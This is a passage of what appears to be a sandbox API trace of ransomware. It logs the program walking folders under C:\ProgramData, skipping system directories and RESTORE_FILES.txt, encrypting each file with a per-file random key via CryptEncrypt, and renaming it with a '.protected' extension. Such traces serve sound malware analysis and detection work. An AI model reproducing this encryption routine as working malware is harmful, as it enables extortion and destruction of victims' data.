pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned 56 [0065.042] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0065.042] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0065.042] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*") returned 58 [0065.042] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x4a9210 [0065.044] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.044] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.044] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.044] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.044] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.044] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\.") returned 58 [0065.044] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.044] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0065.045] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.045] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.045] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.045] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.045] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.045] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\..") returned 59 [0065.045] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.045] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.045] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0065.045] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="Windows") returned -1 [0065.045] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="Program Files") returned -1 [0065.045] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="Program Files (x86)") returned -1 [0065.045] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="$Recycle.bin") returned 1 [0065.045] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="System Volume Information") returned -1 [0065.045] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D") returned 76 [0065.045] StrStrIW (lpFirst="Help_CValidator.H1D", lpSrch=".protected") returned 0x0 [0065.045] lstrcmpW (lpString1="Help_CValidator.H1D", lpString2="RESTORE_FILES.txt") returned -1 [0065.045] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0065.045] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0065.045] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0065.046] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D") returned 76 [0065.046] StrStrW (lpFirst="Help_CValidator.H1D", lpSrch=".txt") returned 0x0 [0065.046] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D") returned 76 [0065.046] StrStrW (lpFirst="Help_CValidator.H1D", lpSrch=".rar") returned 0x0 [0065.046] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D") returned 76 [0065.046] StrStrW (lpFirst="Help_CValidator.H1D", lpSrch=".zip") returned 0x0 [0065.046] ReadFile (in: hFile=0x14c, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.054] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.054] WriteFile (in: hFile=0x14c, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.054] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.055] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0065.055] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0065.055] CloseHandle (hObject=0x14c) returned 1 [0065.055] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D.protected") returned 86 [0065.055] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D.protected" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d.protected")) returned 1 [0065.056] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0065.056] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="Windows") returned -1 [0065.056] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="Program Files") returned -1 [0065.056] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="Program Files (x86)") returned -1 [0065.056] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="$Recycle.bin") returned 1 [0065.056] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="System Volume Information") returned -1 [0065.056] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W") returned 78 [0065.056] StrStrIW (lpFirst="Help_MKWD_AssetId.H1W", lpSrch=".protected") returned 0x0 [0065.056] lstrcmpW (lpString1="Help_MKWD_AssetId.H1W", lpString2="RESTORE_FILES.txt") returned -1 [0065.056] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0065.056] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0065.056] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0065.056] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W") returned 78 [0065.056] StrStrW (lpFirst="Help_MKWD_AssetId.H1W", lpSrch=".txt") returned 0x0 [0065.056] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W") returned 78 [0065.056] StrStrW (lpFirst="Help_MKWD_AssetId.H1W", lpSrch=".rar") returned 0x0 [0065.057] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W") returned 78 [0065.057] StrStrW (lpFirst="Help_MKWD_AssetId.H1W", lpSrch=".zip") returned 0x0 [0065.057] ReadFile (in: hFile=0x14c, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.070] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.070] WriteFile (in: hFile=0x14c, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.071] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.071] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0065.073] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0065.073] CloseHandle (hObject=0x14c) returned 1 [0065.073] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W.protected") returned 88 [0065.073] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W.protected" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w.protected")) returned 1 [0065.074] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0065.074] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="Windows") returned -1 [0065.074] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="Program Files") returned -1 [0065.074] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="Program Files (x86)") returned -1 [0065.074] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="$Recycle.bin") returned 1 [0065.074] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="System Volume Information") returned -1 [0065.074] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W") returned 78 [0065.074] StrStrIW (lpFirst="Help_MKWD_BestBet.H1W", lpSrch=".protected") returned 0x0 [0065.074] lstrcmpW (lpString1="Help_MKWD_BestBet.H1W", lpString2="RESTORE_FILES.txt") returned -1 [0065.074] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0065.074] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0065.074] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0065.076] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W") returned 78 [0065.076] StrStrW (lpFirst="Help_MKWD_BestBet.H1W", lpSrch=".txt") returned 0x0 [0065.076] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W") returned 78 [0065.076] StrStrW (lpFirst="Help_MKWD_BestBet.H1W", lpSrch=".rar") returned 0x0 [0065.076] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W") returned 78 [0065.076] StrStrW (lpFirst="Help_MKWD_BestBet.H1W", lpSrch=".zip") returned 0x0 [0065.076] ReadFile (in: hFile=0x14c, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.084] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.084] WriteFile (in: hFile=0x14c, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.085] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.085] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0065.086] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0065.086] CloseHandle (hObject=0x14c) returned 1 [0065.086] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W.protected") returned 88 [0065.086] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W.protected" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w.protected")) returned 1 [0065.087] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0065.087] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="Windows") returned -1 [0065.087] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="Program Files") returned -1 [0065.087] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="Program Files (x86)") returned -1 [0065.087] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="$Recycle.bin") returned 1 [0065.087] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="System Volume Information") returned -1 [0065.087] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H") returned 75 [0065.087] StrStrIW (lpFirst="Help_MTOC_help.H1H", lpSrch=".protected") returned 0x0 [0065.087] lstrcmpW (lpString1="Help_MTOC_help.H1H", lpString2="RESTORE_FILES.txt") returned -1 [0065.087] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0065.087] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0065.087] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0065.087] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H") returned 75 [0065.087] StrStrW (lpFirst="Help_MTOC_help.H1H", lpSrch=".txt") returned 0x0 [0065.087] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H") returned 75 [0065.087] StrStrW (lpFirst="Help_MTOC_help.H1H", lpSrch=".rar") returned 0x0 [0065.087] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H") returned 75 [0065.087] StrStrW (lpFirst="Help_MTOC_help.H1H", lpSrch=".zip") returned 0x0 [0065.088] ReadFile (in: hFile=0x14c, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.089] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.089] WriteFile (in: hFile=0x14c, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.089] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.090] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0065.097] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0065.097] CloseHandle (hObject=0x14c) returned 1 [0065.097] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H.protected") returned 85 [0065.097] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H.protected" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h.protected")) returned 1 [0065.098] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0065.098] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="Windows") returned -1 [0065.098] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="Program Files") returned -1 [0065.098] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="Program Files (x86)") returned -1 [0065.098] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="$Recycle.bin") returned 1 [0065.098] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="System Volume Information") returned -1 [0065.098] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D") returned 76 [0065.098] StrStrIW (lpFirst="Help_MValidator.H1D", lpSrch=".protected") returned 0x0 [0065.098] lstrcmpW (lpString1="Help_MValidator.H1D", lpString2="RESTORE_FILES.txt") returned -1 [0065.098] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0065.098] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0065.098] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0065.099] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D") returned 76 [0065.099] StrStrW (lpFirst="Help_MValidator.H1D", lpSrch=".txt") returned 0x0 [0065.099] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D") returned 76 [0065.099] StrStrW (lpFirst="Help_MValidator.H1D", lpSrch=".rar") returned 0x0 [0065.099] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D") returned 76 [0065.099] StrStrW (lpFirst="Help_MValidator.H1D", lpSrch=".zip") returned 0x0 [0065.099] ReadFile (in: hFile=0x14c, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.120] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.120] WriteFile (in: hFile=0x14c, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.120] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.121] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0065.463] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0065.463] CloseHandle (hObject=0x14c) returned 1 [0065.466] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D.protected") returned 86 [0065.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D.protected" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d.protected")) returned 1 [0065.466] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0065.466] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="Windows") returned -1 [0065.466] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="Program Files") returned -1 [0065.466] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="Program Files (x86)") returned -1 [0065.466] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="$Recycle.bin") returned 1 [0065.466] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="System Volume Information") returned -1 [0065.466] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck") returned 76 [0065.467] StrStrIW (lpFirst="Help_MValidator.Lck", lpSrch=".protected") returned 0x0 [0065.467] lstrcmpW (lpString1="Help_MValidator.Lck", lpString2="RESTORE_FILES.txt") returned -1 [0065.467] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0065.467] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0065.467] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 